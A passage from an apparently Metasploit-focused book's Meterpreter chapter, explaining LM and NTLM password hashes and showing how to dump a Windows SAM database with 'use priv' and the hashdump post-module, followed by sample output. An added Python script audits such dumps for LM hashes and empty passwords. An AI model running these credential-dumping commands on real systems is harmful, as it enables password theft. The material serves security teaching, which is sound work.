Meterpreter

83

a 7-character password instead of a 14-character one. In NTLM, regardless of the password size, password123456 would be stored as a hash value of password123456.

NOTE

We’re using a super complex password here that we would not be able to crack in a reasonable amount of time. Our password is larger than the 14-character maximum that LM supports, so it has automatically converted itself to an NTLM-based hash value. Even with rainbow tables or a super powerful cracking machine, it would take a significant amount of time to crack these passwords.

In the following code, we extract a username and password hash for the Administrator user account with UID 500 (the Windows Administrator system default). The strings that follow Administrator:500 are two hashes of the Administrator password. This shows an example of a simple extract of a username and password hashes. Shortly, we will extract our own username and password hashes from our Windows XP system.

Administrator:500:e52cac67419a9a22cbb699e2fdfcc59e:30ef086423f916deec378aac42c4ef0c:::

The first hash is an LM hash, and the second is an NTLM hash.
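The record format above (user:RID:LM hash:NT hash:::, where the book calls the RID a UID) is what a defender reviews when auditing a SAM dump, and the two things worth checking are whether an LM hash is still being stored at all and whether the NT hash is the well-known hash of an empty password. The following Python is an added example written for this page, not code from the book or from Metasploit: it parses the page's two Administrator lines plus two constructed records, flags accounts that still carry an LM hash (so the password is at most 14 characters and case-folded), flags an LM second half equal to the null block (password of 7 characters or fewer), and flags an empty NT hash. The constants LM_EMPTY and NT_EMPTY are the standard empty-password hashes; the Guest and svc_backup lines and the helper names are constructed for the example.

```python
"""Audit pwdump/hashdump-style records for weak or empty stored hashes.

Added example for this page; not the book's or Metasploit's code.
"""
import re
from typing import Dict, List, Tuple

# Well-known constants: the LM hash of an empty password is one DES block
# repeated twice, and the NT hash of an empty password is MD4 of the empty string.
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"
LM_EMPTY_HALF = LM_EMPTY[:16]          # "aad3b435b51404ee"
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"

HEX32 = re.compile(r"^[0-9a-f]{32}$")


def is_null_hash(field: str, empty_hash: str) -> bool:
    """A field carries no usable hash when it is the empty-string hash or a
    textual placeholder such as NOPASSWD (the page's example) or NO PASSWORD*."""
    f = field.strip().lower()
    return f == empty_hash or f.startswith("no")


def parse_hashdump_line(line: str) -> Dict[str, object]:
    """Split a user:rid:lmhash:nthash::: record into fields, validating that
    each hash field is 32 hex digits or a recognised placeholder."""
    parts = line.strip().split(":")
    if len(parts) < 4 or any(parts[4:]):
        raise ValueError(f"not a hashdump record: {line!r}")
    user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not rid.isdigit():
        raise ValueError(f"bad RID in record: {line!r}")
    for name, h in (("LM", lm), ("NT", nt)):
        if not (HEX32.match(h) or h.startswith("no")):
            raise ValueError(f"bad {name} hash in record: {line!r}")
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt}


def assess(line: str) -> Dict[str, object]:
    """Return the parsed record plus the findings a reviewer of a SAM dump cares about."""
    rec = parse_hashdump_line(line)
    lm_present = not is_null_hash(rec["lm"], LM_EMPTY)
    nt_present = not is_null_hash(rec["nt"], NT_EMPTY)
    findings: List[str] = []
    if not nt_present:
        findings.append("empty password")
    if lm_present:
        # LM upper-cases the password and DES-encrypts each 7-character half
        # separately, so a stored LM hash means the password is at most 14
        # characters and each half stands on its own.
        findings.append("LM hash stored (password <= 14 chars, case-insensitive)")
        if rec["lm"][16:] == LM_EMPTY_HALF:
            findings.append("LM second half is null (password <= 7 chars)")
    if rec["rid"] == 500:
        findings.append("built-in Administrator (RID 500)")
    rec.update(lm_present=lm_present, nt_present=nt_present, findings=findings)
    return rec


def audit(lines: List[str]) -> Tuple[List[Dict[str, object]], int]:
    """Assess every record (skipping blank and [*] status lines) and count how
    many accounts still store an LM hash, the number a NoLMHash policy drives to zero."""
    results = [assess(l) for l in lines if l.strip() and not l.startswith("[")]
    return results, sum(1 for r in results if r["lm_present"])


SAMPLE = [
    # The two Administrator records shown on this page (with and without an LM hash):
    "Administrator:500:e52cac67419a9a22cbb699e2fdfcc59e:30ef086423f916deec378aac42c4ef0c:::",
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29:::",
    # Constructed for this example: an account whose NT hash is the empty-password hash.
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    # Constructed for this example: an LM hash whose second half is the null block.
    "svc_backup:1001:0123456789abcdefaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
]

if __name__ == "__main__":
    results, lm_count = audit(SAMPLE)
    for r in results:
        print(f"{r['user']} (RID {r['rid']}): {'; '.join(r['findings']) or 'no findings'}")
    print(f"{lm_count} of {len(results)} accounts still store an LM hash")
```

Run against the page's first Administrator line, the audit reports a stored LM hash with a non-null second half (a password of 8 to 14 characters); against the second line it reports only the RID 500 note, which is the state the NoLMHash policy ("Network security: Do not store LAN Manager hash value on next password change") produces once every account has changed its password.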

Dumping the Password Hash

On your target machine, change your password to something complex, such as thisisacrazylongpassword&&!!@@## and use Meterpreter to dump the username and password hashes (shown in the preceding code listing) from the target again. We will leverage the use priv command, which means we are running as a privileged user account.

To dump the Security Account Manager (SAM) database, we need to be running as SYSTEM to get around the registry restrictions and dump the protected SAM storage that contains our Windows usernames and passwords, as shown next. Try performing this scenario on a test virtual machine to see if you can dump the username and password hashes. In this listing, we execute the hashdump command, which dumps all the usernames and password hashes from the system.

meterpreter > use priv
Loading extension priv...success.
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29:::

A hash value that starts with aad3b435 is simply an empty or null hash value—a placeholder for an empty string. (Something like Administrator:500:NOPASSWD:ntlmhash is also null.) Because our password